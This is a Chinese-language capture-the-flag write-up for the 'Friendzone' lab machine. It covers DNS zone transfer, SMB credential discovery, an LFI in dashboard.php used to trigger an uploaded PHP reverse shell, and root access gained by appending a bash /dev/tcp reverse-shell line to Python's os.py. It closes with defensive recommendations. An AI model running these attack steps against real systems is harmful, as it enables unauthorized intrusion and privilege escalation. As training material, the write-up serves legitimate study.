Friendzone LFI漏洞利用与Python OS库污染权限提升攻击分析<\/h1>

1. 信息收集阶段<\/h2>

1.1 初始扫描<\/h3>
使用Nmap进行全端口扫描：<\/p>
nmap -p- 10.10.10.123 --min-rate 1000<\/span> -sC -sV
<\/span><\/span><\/code><\/pre>发现开放服务：<\/p>

21\/tcp: vsftpd 3.0.3 (FTP)<\/li>
22\/tcp: OpenSSH 7.6p1 Ubuntu 4<\/li>
53\/tcp: ISC BIND 9.11.3-1ubuntu1.2 (DNS)<\/li>
80\/tcp: Apache httpd 2.4.29<\/li>
139\/tcp: Samba smbd 3.X - 4.X<\/li>
443\/tcp: Apache httpd 2.4.29 (HTTPS)<\/li>
445\/tcp: Samba smbd 4.7.6-Ubuntu<\/li>
<\/ul>
1.2 DNS枚举<\/h3>
执行DNS区域传输：<\/p>
dig axfr friendzone.red @10.10.10.123
<\/span><\/span><\/code><\/pre>发现子域名：<\/p>

administrator1.friendzone.red<\/li>
hr.friendzone.red<\/li>
uploads.friendzone.red<\/li>
<\/ul>
1.3 SMB枚举<\/h3>
使用enum4linux和smbclient枚举SMB共享：<\/p>
enum4linux 10.10.10.123
<\/span><\/span>smbclient \/\/10.10.10.123\/general
<\/span><\/span><\/code><\/pre>在general共享中发现creds.txt文件，获取凭据：<\/p>
username: admin
password: WORKWORKHhallelujah@#
<\/code><\/pre>
2. Web应用渗透<\/h2>
2.1 目录爆破<\/h3>
使用gobuster进行目录扫描：<\/p>
gobuster dir -u "https:\/\/administrator1.friendzone.red"<\/span> -w \/usr\/share\/seclists\/Discovery\/Web-Content\/raft-small-words.txt -x txt,php -b 404,403 -t 50<\/span> -k
<\/span><\/span><\/code><\/pre>发现关键页面：<\/p>

\/login.php<\/li>
\/dashboard.php<\/li>
<\/ul>
2.2 登录尝试<\/h3>
使用之前获取的凭据登录：<\/p>
https:\/\/administrator1.friendzone.red\/login.php
username: admin
password: WORKWORKHhallelujah@#
<\/code><\/pre>
2.3 LFI漏洞利用<\/h3>
发现dashboard.php存在本地文件包含(LFI)漏洞：<\/p>
https:\/\/administrator1.friendzone.red\/dashboard.php?image_id=a.jpg&pagename=\/etc\/Development\/php-reverse-shell
<\/code><\/pre>
3. 初始访问获取<\/h2>
3.1 上传Web Shell<\/h3>
通过SMB共享上传PHP反向Shell：<\/p>
smbclient \/\/10.10.10.123\/Development
<\/span><\/span>put php-reverse-shell.php
<\/span><\/span><\/code><\/pre>3.2 触发反向Shell<\/h3>
通过LFI漏洞触发上传的PHP反向Shell：<\/p>
https:\/\/administrator1.friendzone.red\/dashboard.php?image_id=a.jpg&pagename=\/etc\/Development\/php-reverse-shell
<\/code><\/pre>
4. 权限提升<\/h2>
4.1 内部侦察<\/h3>
获取user.txt标志：<\/p>
ad2906258fb6679290609a6b243b6078
<\/code><\/pre>
4.2 进程监控<\/h3>
上传并运行pspy32监控进程：<\/p>
cp \/etc\/Development\/pspy32 \/tmp
<\/span><\/span>chmod +x \/tmp\/pspy32
<\/span><\/span>\/tmp\/pspy32
<\/span><\/span><\/code><\/pre>4.3 发现Python脚本<\/h3>
发现\/opt\/server_admin\/reporter.py脚本定期以root权限执行：<\/p>
# 内容可能包含对os模块的调用<\/span>
<\/span><\/span><\/code><\/pre>4.4 Python库污染攻击<\/h3>
检查Python库位置：<\/p>
ls -la \/usr\/lib\/python2.7\/os.py
<\/span><\/span><\/code><\/pre>修改os.py注入恶意代码：<\/p>
echo 'system("\/bin\/bash -c \"\/bin\/sh -i >& \/dev\/tcp\/10.10.16.6\/10033 0>&1\"")'<\/span> >> \/usr\/lib\/python2.7\/os.py
<\/span><\/span><\/code><\/pre>等待reporter.py以root权限执行，获取root shell。<\/p>
4.5 获取root标志<\/h3>
253809a3fa48b78d59b7884199f37b35
<\/code><\/pre>
5. 关键知识点总结<\/h2>

DNS区域传输<\/strong>：通过dig axfr可尝试获取域内所有DNS记录<\/li>
SMB共享枚举<\/strong>：smbclient和enum4linux是枚举SMB共享的有效工具<\/li>
LFI漏洞利用<\/strong>：通过文件包含参数可以包含服务器上的任意文件<\/li>
SMB文件上传<\/strong>：通过SMB共享上传Web Shell是常见的初始访问方法<\/li>
Python库污染<\/strong>：当Python脚本以root权限运行时，污染其导入的库(如os.py)可实现权限提升<\/li>
进程监控<\/strong>：pspy等工具可帮助发现以高权限运行的周期性任务<\/li>
<\/ol>
6. 防御建议<\/h2>

禁用DNS区域传输<\/li>
限制SMB共享的匿名访问<\/li>
对文件包含功能实施严格的白名单过滤<\/li>
设置Python库文件的不可变标志(chattr +i)<\/li>
使用最小权限原则运行计划任务和后台服务<\/li>
定期审计系统上的setuid文件和可写目录<\/li>
<\/ol>